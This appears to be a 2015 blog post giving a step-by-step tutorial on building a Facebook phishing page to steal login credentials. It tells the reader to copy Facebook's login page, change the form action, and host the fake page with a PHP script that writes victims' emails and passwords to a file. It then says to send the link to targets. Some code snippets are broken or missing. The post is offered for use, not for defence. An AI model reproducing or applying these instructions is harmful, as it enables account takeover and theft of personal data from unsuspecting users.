Friday, 16 October 2015

How To Hack Facebook Account!

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Assalam-u-Alaikum Friends,
                                                                         My latest lecture regarding Facebook Phishing attack and we are so glad to announce that we have developed some new phishing script for Facebook which is working 100 %. Click this link know what is PHISHING and how to create phishing pages for Gmail, Orkut etc. I don’t know how many of you are aware of phishing attacks, Anyway keep in mind that, It is very easy way to hack personal details. In this article I am going to share some ideas about Phishing and will show you how to make your own Phishing pages for Facebook. For making Phishing page for any site you need 3 types of files in common. They are:

.Html file ( ie fake page )
.Php file or any other action script page (for tracking the details that entered in page created by you)
.Txt file ( To save all the details in text format )

1. First go to Facebook login page (make sure that the page is loaded completely) and right click and select view source (in firefox) or view source code option in other browsers.

2. Select all ( CTR + A ) and copy all the code and paste it in notepad.

3. Then search(CTR + F) for the keyword action. You can see the code as given below.

4. Just change the above code as mentioned below


after changing to pass.php (or chamber.php) just save it in the form facebook.html (chamber.html). After finishing this step our phishing page is ready. Now we want to create script page for this phishing page.

5. For creating a php script, just copy the below php code into notepad and save in the format pass.php (name mentioned in action of our phishing page)

< ?php $fp = fopen("Passwords.htm", "a"); fwrite($fp, "Email:$_POST[email]\tPassword:$_POST[pass]"); echo "

Note:‘‘ is the redirection url,When victim will enter his/her email and password he will redirected to’‘

6. By this step our PHP script is also ready,
7. Now host these 2 files ie,
in any of free hosting servers like ripway,drivehq,110 mb or etc (or any other,just google free hosting).Make sure that these 2 files are in same directory.

8. After hosting you will get a direct link to your phishing page,that is to your facebook.html page.just use this link to access or send phishing page.

9. When anyone tries to login through your phishing page a new html page with name password.html will be automatically created in your hosting directory with the password and username entered there.
Thanks For Visit:

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